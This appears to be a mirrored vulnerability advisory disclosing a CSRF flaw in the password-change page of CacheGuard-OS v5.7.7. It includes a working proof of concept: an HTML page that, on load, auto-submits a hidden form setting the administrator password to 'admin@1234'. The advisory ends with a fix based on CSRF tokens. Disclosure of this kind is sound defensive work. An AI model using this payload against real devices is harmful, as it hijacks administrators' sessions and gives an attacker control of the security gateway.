扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering, proxy, high availability, content filtering, bandwidth saving, bandwidth shaping, Quality of Service and more. III. DESCRIPTION ------------------------- Has been detected a CSRFvulnerability in CacheGuard in "/gui/password-wadmin.apl" IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter any csrf_token "/gui/password-wadmin.apl". <html> <body onload="CSRF.submit();"> <br> <br> <form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl" method="post" name="CSRF"> <input name="password1" value="admin@1234" type=hidden> </input> <input name="password2" value="admin@1234" type=hidden> </input> </form> </body> </html> V. BUSINESS IMPACT ------------------------- CSRF allow the execution attackers to modify settings or change password of user administrator in CacheGuard, because this functions are not protected by CSRF-Tokens. VI. REQUIREMENTS ----------------------- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED ------------------------- Try CacheGuard-OS v5.7.7 VIII. SOLUTION ------------------------- All functions must be protected by CSRF-Tokens. http://www.kb.cert.org/vuls/id/241508 By William Costa william.costa no spam gmail.com |
体验盒子
